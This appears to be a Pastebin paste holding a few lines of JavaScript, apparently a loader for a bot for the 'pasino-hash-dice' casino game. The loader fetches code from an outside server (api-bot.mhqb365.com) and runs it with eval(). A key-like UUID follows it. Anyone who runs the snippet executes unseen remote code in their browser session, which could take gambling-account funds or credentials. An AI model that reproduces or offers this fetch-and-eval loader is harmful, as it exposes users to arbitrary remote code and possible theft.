Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- const WDB_API = 'https://api-bot.mhqb365.com';
- const CASINO_GAME = 'pasino-hash-dice';
- (async function () {
- let installer = await fetch(WDB_API + '/stable/init')
- installer = await installer.text()
- eval(installer)
- })();
- 718268c3-db48-46a4-bfa0-84eb6395dab8
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement